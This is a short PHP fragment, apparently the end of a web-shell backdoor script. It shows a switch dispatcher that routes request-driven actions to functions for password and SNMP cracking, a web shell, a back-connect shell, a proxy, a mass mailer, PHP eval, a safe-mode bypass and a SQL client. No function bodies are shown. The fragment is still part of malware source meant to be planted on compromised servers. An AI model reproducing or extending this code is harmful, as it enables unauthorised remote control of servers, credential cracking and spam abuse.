case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;
case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>